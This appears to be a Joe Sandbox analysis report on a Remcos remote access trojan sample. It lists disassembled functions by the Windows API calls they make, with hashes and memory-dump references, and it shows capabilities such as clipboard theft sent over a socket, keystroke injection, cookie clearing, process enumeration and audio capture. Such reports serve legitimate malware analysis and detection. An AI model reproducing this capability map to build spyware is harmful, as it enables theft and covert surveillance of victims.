                                        • API String ID: 3286818993-703403762
                                        • Opcode ID: f6ea33bfe9aeb7d2f24a1418d8181db5ac7c03ccdcffe2a82dcde258621e9c28
                                        • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                        • Opcode Fuzzy Hash: f6ea33bfe9aeb7d2f24a1418d8181db5ac7c03ccdcffe2a82dcde258621e9c28
                                        • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                        Function 0040B6EA Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                        • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$TUF
                                        • API String ID: 1133728706-1738023494
                                        • Opcode ID: bb986ea289b59e8881aae87098969c6da156300248b9d043587579c05a1b425d
                                        • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                        • Opcode Fuzzy Hash: bb986ea289b59e8881aae87098969c6da156300248b9d043587579c05a1b425d
                                        • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                        Function 0041BEC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                        • GetConsoleWindow.KERNEL32 ref: 0041BECF
                                        • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Console$Window$AllocOutputShow
                                        • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                        • API String ID: 4067487056-2527699604
                                        • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                        • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                        • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                        • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                        Function 00449960 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D574,0043D574,?,?,?,00449BB1,00000001,00000001,1AE85006), ref: 004499BA
                                        • __alloca_probe_16.LIBCMT ref: 004499F2
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BB1,00000001,00000001,1AE85006,?,?,?), ref: 00449A40
                                        • __alloca_probe_16.LIBCMT ref: 00449AD7
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                        • __freea.LIBCMT ref: 00449B47
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        • __freea.LIBCMT ref: 00449B50
                                        • __freea.LIBCMT ref: 00449B75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                        • String ID:
                                        • API String ID: 3864826663-0
                                        • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                        • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                                        • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                        • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                        Function 00418ACE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendInput.USER32 ref: 00418B18
                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                          • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InputSend$Virtual
                                        • String ID:
                                        • API String ID: 1167301434-0
                                        • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                        • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                        • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                        • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                        Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32 ref: 00415A46
                                        • EmptyClipboard.USER32 ref: 00415A54
                                        • CloseClipboard.USER32 ref: 00415A5A
                                        • OpenClipboard.USER32 ref: 00415A61
                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                        • CloseClipboard.USER32 ref: 00415A89
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                        • String ID:
                                        • API String ID: 2172192267-0
                                        • Opcode ID: d9c410470e1138b8a4c9be85fd81145319fac6db587be0b527b00daa86c960c7
                                        • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                        • Opcode Fuzzy Hash: d9c410470e1138b8a4c9be85fd81145319fac6db587be0b527b00daa86c960c7
                                        • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                        Function 00446169 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16
                                        • String ID: a/p$am/pm$fD
                                        • API String ID: 3509577899-1143445303
                                        • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                        • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                        • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                        • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                        Function 00447E4A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00447ECC
                                        • _free.LIBCMT ref: 00447EF0
                                        • _free.LIBCMT ref: 00448077
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                        • _free.LIBCMT ref: 00448243
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                        • String ID:
                                        • API String ID: 314583886-0
                                        • Opcode ID: 987cd6ff04374740ad638309c533d0c602dfd377e295f885280b4824386cdb1c
                                        • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                                        • Opcode Fuzzy Hash: 987cd6ff04374740ad638309c533d0c602dfd377e295f885280b4824386cdb1c
                                        • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                                        Function 0044F816 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                        • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                        • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                        • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                        Function 00443F8B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        • _free.LIBCMT ref: 00444096
                                        • _free.LIBCMT ref: 004440AD
                                        • _free.LIBCMT ref: 004440CC
                                        • _free.LIBCMT ref: 004440E7
                                        • _free.LIBCMT ref: 004440FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$AllocateHeap
                                        • String ID: Z7D
                                        • API String ID: 3033488037-2145146825
                                        • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                        • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                        • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                        • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                        Function 0044A0D3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                        • __fassign.LIBCMT ref: 0044A190
                                        • __fassign.LIBCMT ref: 0044A1AB
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                        • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                        • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                        • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                        • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                        • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                        Function 00401768 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ExitThread.KERNEL32 ref: 004017F4
                                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                        • __Init_thread_footer.LIBCMT ref: 004017BC
                                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                        • String ID: T=G$>G$>G
                                        • API String ID: 1596592924-1617985637
                                        • Opcode ID: 7fea690cd5114764ac3b3016db8b19bc4d1365cb468e8419b76e50a1049d06b2
                                        • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                        • Opcode Fuzzy Hash: 7fea690cd5114764ac3b3016db8b19bc4d1365cb468e8419b76e50a1049d06b2
                                        • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                        Function 0040E6A3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                          • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                        • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                          • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                          • Part of subcall function 0041B197: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1B7
                                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                        • String ID: PgF
                                        • API String ID: 2180151492-654241383
                                        • Opcode ID: d45e152db1594e52a28c92c812a6bfc09764fa0d060a7e5a38ae0a426294ee6f
                                        • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                        • Opcode Fuzzy Hash: d45e152db1594e52a28c92c812a6bfc09764fa0d060a7e5a38ae0a426294ee6f
                                        • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                        Function 00437A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                        • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                        • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                        • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                        • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                        • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                        Function 00455913 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
